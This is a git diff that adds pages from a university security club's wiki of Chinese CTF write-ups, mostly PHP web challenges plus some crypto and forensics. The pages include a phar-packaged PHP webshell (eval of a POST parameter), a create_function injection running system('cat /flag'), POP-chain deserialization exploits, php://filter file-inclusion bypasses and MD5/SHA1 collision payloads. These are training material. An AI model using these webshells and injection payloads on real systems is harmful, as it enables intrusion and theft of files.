    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2026-wp/index.html b/ctfnotes/problem-2026-wp/index.html new file mode 100755 index 0000000..5c603fd --- /dev/null +++ b/ctfnotes/problem-2026-wp/index.html @@ -0,0 +1,1285 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NISACTF 2022]bingdundun~ - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NISACTF 2022]bingdundun~

    +

    phar 上传然后phar伪协议访问

    +
    
+//pchar.php
+<?php
+$phar = new Phar('exp.phar');   //
+$phar->buildFromDirectory('./exp');//buildFromDirectory指定压缩的目录
+$phar->compressFiles(Phar::GZ);  //Phar::GZ表示使用gzip来压缩此文件
+$phar->stopBuffering();
+$phar->setStub($phar->createDefaultStub('exp.php'));//setSub用来设置启动加载的文件
+?>
+//exp/exp.php
+<?php
+@eval($_POST['shell']);
+?>
+
    +

    最后蚁剑访问 密码shell +?bingdundun=phar://./upload_name/exp

    +

    flag就在/flag里

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2036-wp/index.html b/ctfnotes/problem-2036-wp/index.html new file mode 100755 index 0000000..ec24d13 --- /dev/null +++ b/ctfnotes/problem-2036-wp/index.html @@ -0,0 +1,1295 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NISACTF 2022]level-up - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NISACTF 2022]level-up

    +
      +
    1. level-1 +进入写着nothing here +F12发现写着disallow +推测robots.txt +访问即获得level 2地址
      2. +
    2. level-2 +php md5 强碰撞 +post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 +&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 +解决 +得到level 3地址
      3. +
    3. level-3 +php sha1 强碰撞 +post +array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1 +&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1 +得到level-4地址
      4. +
    4. level-4 +php变量解析绕过 +使用GET NI+SA+=txw4ever +得到level5地址
      5. +
    5. level-5 +createfunction绕过 +exp +?a=\create_function&b=return%200;}var_dump(system("cat%20/flag"));/* +得到flag
      6. +
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2049-wp/index.html b/ctfnotes/problem-2049-wp/index.html new file mode 100755 index 0000000..5f81a44 --- /dev/null +++ b/ctfnotes/problem-2049-wp/index.html @@ -0,0 +1,1280 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NISACTF 2022]huaji? - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NISACTF 2022]huaji?

    +
      +
    1. binwalk分析 +得到内部有个压缩包 +加密了 +在原图大空白处找到 +两段 +6374665f4e4953415f32303232 +6e6973615f32303232 +hex编码得 +ctf_NISA_2022 +和nisa_2022 +成功解压压缩包得到flag
      2. +
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2074-wp/index.html b/ctfnotes/problem-2074-wp/index.html new file mode 100755 index 0000000..0e5fede --- /dev/null +++ b/ctfnotes/problem-2074-wp/index.html @@ -0,0 +1,1268 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NSSCTF 2022 Spring Recruit]ezgame - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NSSCTF 2022 Spring Recruit]ezgame

    +

    F12分析即拿flag在./js/preload.js里

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2076-wp/index.html b/ctfnotes/problem-2076-wp/index.html new file mode 100755 index 0000000..0910326 --- /dev/null +++ b/ctfnotes/problem-2076-wp/index.html @@ -0,0 +1,1275 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NSSCTF 2022 Spring Recruit]babyphp - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NSSCTF 2022 Spring Recruit]babyphp

    +
      +
    1. 第一层非空数组绕过 +post a[]=[1]
      2. +
    2. 非空空数组MD5 +post b1[]=[1]&b2[]=[2]
      3. +
    3. MD5 绕过 +post c1=s878926199a&c2=s155964671a
      4. +
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2099-wp/index.html b/ctfnotes/problem-2099-wp/index.html new file mode 100755 index 0000000..2d9d02c --- /dev/null +++ b/ctfnotes/problem-2099-wp/index.html @@ -0,0 +1,1349 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NISACTF 2022]popchains - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NISACTF 2022]popchains

    +
      +
    1. 审计源码
      2. +
    2. 构建pop链
      3. +
    +
    Try_Work_Hard.__invoke()
+    =>Make_a_change.__get
+        => Road_is_Long.__toString()
+           => Road_is_Long.__wakeup()
+
    +
      +
    1. 编写exp +~~有坏b误导我我不说是谁~~
      2. +
    +
    <?php
+
+//echo 'Happy New Year~ MAKE A WISH<br>';
+
+/***************************pop your 2022*****************************/
+
+class Road_is_Long
+{
+    public $page;
+    public $string;
+    public function __construct($file = 'index.php')
+    {
+        $this->page = $file;
+    }
+    public function __toString()
+    {
+        return $this->string->page;
+    }
+
+    public function __wakeup()
+    {
+        if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
+            echo "You can Not Enter 2022";
+            $this->page = "index.php";
+        }
+    }
+}
+
+class Try_Work_Hard
+{
+    protected $var;
+    public function __construct(){
+        $this->var = "/flag";
+    }
+    public function append($value)
+    {
+        include($value);
+    }
+    public function __invoke()
+    {
+        $this->append($this->var);
+    }
+}
+
+class Make_a_Change
+{
+    public $effort;
+    public function __construct()
+    {
+        $this->effort = array();
+    }
+
+    public function __get($key)
+    {
+        $function = $this->effort;
+        return $function();
+    }
+}
+
+$a = new Try_Work_Hard;
+$b = new Make_a_Change;
+$c = new Road_is_Long;
+$d = new Road_is_Long;
+
+$b->effort = $a;
+$c->string = $b;
+$d->page = $c;
+echo "?wish=" . urlencode(serialize($d));
+
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-227-wp/index.html b/ctfnotes/problem-227-wp/index.html new file mode 100755 index 0000000..08307da --- /dev/null +++ b/ctfnotes/problem-227-wp/index.html @@ -0,0 +1,1291 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [羊城杯 2021]Bigrsa - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [羊城杯 2021]Bigrsa

    +
      +
    1. 共享素数 +$n_1 n_2$有一素数公因数$p$ +$n_1=pq_1 n_2=pq_2$ +$d_1e\equiv 1\space mod\space\varphi(n_1)$ +$d_2e\equiv 1\space mod\space\varphi(n_2)$ +$\therefore 只需要逆元求出\frac{1}{e}\space mod\space \varphi(n_1)和\frac{1}{e}\space mod\space \varphi(n_2)就可以得到d_1和d_2$
      2. +
    2. exp
      3. +
    +
    from gmpy2 import *
+from Crypto.Util.number import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+p = gmpy2.gcd(n1, n2)
+q1, q2 = n1//p, n2//p
+phi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)
+d1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)
+
+m = pow(pow(c, d2, n2), d1, n1)
+print(long_to_bytes(m).decode())
+
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2422-wp/index.html b/ctfnotes/problem-2422-wp/index.html new file mode 100755 index 0000000..f531631 --- /dev/null +++ b/ctfnotes/problem-2422-wp/index.html @@ -0,0 +1,1306 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [鹏城杯 2022]简单包含 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [鹏城杯 2022]简单包含

    +
      +
    1. 审计源码发现其会include'flag'的文件进来
      2. +
    2. 尝试post flag
      3. +
    +

    exp-fake

    +
    flag = flag.php
+
    +

    获得nssctf waf!

    +

    尝试获取flag.php

    +
    flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
    +

    仍然获得获得nssctf waf!

    +

    尝试获取index.php

    +
    flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php
+
    +

    解码得

    +
    <?php
+
+$path = $_POST["flag"];
+
+if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
+    echo 'nssctf waf!';
+} else {
+    @include($path);
+} ?>
+
+<code>
+<span style="color: #000000">
+<span style="color: #0000BB">&lt;?php&nbsp;<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag&nbsp;in&nbsp;/var/www/html/flag.php;</span>
+</span>
+</code><br />
+
+
    +

    得知可以通过post超长的request来绕过 +所以 +exp

    +
    a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
    +

    解码即获得flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-2602-wp/index.html b/ctfnotes/problem-2602-wp/index.html new file mode 100755 index 0000000..433f152 --- /dev/null +++ b/ctfnotes/problem-2602-wp/index.html @@ -0,0 +1,1276 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [HUBUCTF 2022 新生赛]checkin - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [HUBUCTF 2022 新生赛]checkin

    +
      +
    1. 审计源码 发现使用 ==
      2. +
    2. 写exp
      3. +
    +
    <?php 
+$data_unserialize = ["username"=>true,"password"=>true];
+echo "?info="urlencode(serialize(($data_unserialize)));
+
    +

    传入即得

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-39-wp/index.html b/ctfnotes/problem-39-wp/index.html new file mode 100755 index 0000000..32f42e0 --- /dev/null +++ b/ctfnotes/problem-39-wp/index.html @@ -0,0 +1,1282 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPU 2019]神奇的二维码 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPU 2019]神奇的二维码

    +
      +
    1. binwalk 分析 +发现里面有4个压缩包 +binwalk -b 解开 +得到flag.doc,flag.jpg,encode.txt,good.rar +4个主要文件
      2. +
    2. 对flag.doc内部内容解码 +得到 +comEON_YOuAreSOSoS0great +这个就是good.rar的解压密码 +解开good.rar得到good.mp3
      3. +
    3. 听一下为摩斯电码 +Audacity 可视化 +在线解码下得到flag
      4. +
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-403-wp/index.html b/ctfnotes/problem-403-wp/index.html new file mode 100755 index 0000000..748d92a --- /dev/null +++ b/ctfnotes/problem-403-wp/index.html @@ -0,0 +1,1286 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]简简单单的逻辑 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]简简单单的逻辑

    +
      +
    1. 审计源码 +因为异或的逆运算就是异或 +所以可以直接编写exp
      2. +
    2. 编写exp
      3. +
    +
    def decode(cipher):
+    flag = ''
+    for i in range(len(list)):
+        key = (list[i]>>4)+((list[i] & 0xf)<<4)
+        now = cipher[2*i:2*i+2]
+        print(now)
+        now = int(now,16)
+        print(now)
+        now^=key
+        flag+=chr(now)
+    print(flag)
+decode(result)
+
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-404-wp/index.html b/ctfnotes/problem-404-wp/index.html new file mode 100755 index 0000000..31d3f5c --- /dev/null +++ b/ctfnotes/problem-404-wp/index.html @@ -0,0 +1,1293 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]简简单单的解密 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]简简单单的解密

    +

    没什么好写的照着代码逆回去就行了

    +
    import base64
+import urllib.parse
+key = "HereIsFlagggg"
+s_box = list(range(256))
+j = 0
+for i in range(256):
+    j = (j + s_box[i] + ord(key[i % len(key)])) % 256
+    s_box[i], s_box[j] = s_box[j], s_box[i]
+enc = "%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA"
+
+enc = urllib.parse.unquote(enc)
+crypt = str(base64.b64encode(bytes(enc, 'utf8')), 'utf-8')
+cipher = base64.b64decode(bytes(crypt, 'utf8')).decode('utf-8')
+res = list(cipher)
+flag = ''
+i = j = 0
+for s in res:
+    i = (i + 1) % 256
+    j = (j + s_box[i]) % 256
+    s_box[i], s_box[j] = s_box[j], s_box[i]
+    t = (s_box[i] + s_box[j]) % 256
+    k = s_box[t]
+    flag += chr(ord(s)^k)
+print(flag)
+
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-413-wp/index.html b/ctfnotes/problem-413-wp/index.html new file mode 100755 index 0000000..3ec3c6f --- /dev/null +++ b/ctfnotes/problem-413-wp/index.html @@ -0,0 +1,1344 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]crypto2 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]crypto2

    +

    共模攻击

    +

    顺便巩固下rsa

    +

    符号 +c:密文 +m:明文 +(d,n):私钥 +(e,n):公钥

    +

    p q 为生成n的两个大质数

    +

    有$n=pq$ +由欧拉函数的定义得$\varphi (n)=\varphi (p)\varphi (q)=(p-1)(q-1)$

    +

    任意选一正整数e 使得$gcd(e,\varphi (n))=1$

    +

    $d$ 满足 $(de)\space mod \space \varphi (n)=1$ 即 $(de) = k\varphi (n)+1,k \ge 1$

    +

    将$m$加密为$c$ +$c=m^e\space mod \space n$

    +

    将$c$解密为$m$

    +

    $m=c^d\space mod \space n$

    +

    证明 +$$ +\because c=m^e\space mod \space n\ +\therefore c \equiv m^e\space mod \space n\ +\therefore c^d \equiv m^{ed}\space mod \space n\ +\therefore c^d \equiv m^{k\varphi (n)+1}\space mod \space n\ +\space\ +当gcd(m,n)=1时有:\ +c^d \equiv (m^{\varphi (n)})^{k}\times m\space mod \space n\ +c^d \equiv 1^k\times m\space mod \space n\ +c^d \equiv m\space mod \space n\ +\space\ +当gcd(m,n)\ne1时有:\ +此时必定有gcd(q,m)=1或gcd(p,m)=1\ +设m=m^{'}p \space 此时 gcd(q,m)=1\ +c^d \equiv m^{k\varphi (p)\varphi (q)}\times m\space mod\space n\ +c^d \equiv (m^{\varphi(q)\varphi(p)})^{k}\times m\space mod \space n\ +又\because m^{\varphi(q)}\equiv 1 \space mod \space q\ +\therefore m^{k\varphi(q)\varphi(p)}\equiv 1^{k\varphi(p)} \space mod \space q\ +\therefore m^{k\varphi(q)\varphi(p)}=(k_2q+1) +代入得\ +c^d \equiv (k_2q+1)\times m\space mod \space n\ +c^d \equiv (k_2m^{'}pq+m)\times m\space mod \space n\ +c^d \equiv m\space mod \space n\ +证毕. +$$

    +

    附: +1. 欧拉定理 +$$ +a^{\varphi(n)}\equiv 1\space mod\space n,当gcd(n,a)=1且n,a\ge0 +$$ +且当n为质数时为费马小定理 +$$ +a^{n-1}\equiv 1(mod\space n) +$$

    +

    共模攻击原理

    +

    $e_1,e_2,n,c_1,c_2$ 已知 +且 +$c_1=m^{e_1}\space mod + \space n$ + $c_2=m^{e_2}\space mod + \space n$ +当$gcd(e_1,e_2)=1$

    +

    有$m=(c_1^{s_1}\times c_2^{s_2})\space mod \space n$ +其中$e_1s_1+e_2s_2=1$ +证明 +$$ +m\ +=m^1\ +=m^{e_1s_1+e_2s_2}\ +=(m^{e_1})^{s_1}(m^{e_2})^{s_2}\ +\equiv c_1^{s_1}c_2^{s_2}\space mod\space n\ +证毕. +$$

    +

    所以解共模题时只要用exgcd求出 +$s_1,s_2$

    +

    附: +1. 贝祖定理 +$$ +ax+by=gcd(a,b) +$$

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-440-wp/index.html b/ctfnotes/problem-440-wp/index.html new file mode 100755 index 0000000..37c958a --- /dev/null +++ b/ctfnotes/problem-440-wp/index.html @@ -0,0 +1,1334 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]pop - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]pop

    +

    ~~你这个取名真的可以的~~ +1. 审计源码 +2. 寻找pop链

    +

    知识点: +变量后面加括号是动态调用函数

    +
    $abc('asd')
+等价于
+asd(abc);
+
    +

    unserialize -> w22m.__construct -> w22m.__destruct -> +w33m.__toString -> w44m.__construct & w44m.Getflag

    +
      +
    1. 编写exp
      2. +
    +
    <?php
+class w44m
+{
+    private $admin = 'aaa';
+    protected $passwd = '123456';
+    public function __construct()
+    {
+        $this->admin = 'w44m';
+        $this->passwd = '08067';
+    }
+    public function Getflag()
+    {
+        if ($this->admin === 'w44m' && $this->passwd === '08067') {
+            include('flag.php');
+            echo $flag;
+        } else {
+            echo $this->admin;
+            echo $this->passwd;
+            echo 'nono';
+        }
+    }
+}
+class w33m
+{
+    public $w00m;
+    public $w22m;
+    public function __toString()
+    {
+        $this->w00m->{$this->w22m}();
+        return 0;
+    }
+    public function __construct(){
+        $this->w22m = "Getflag";
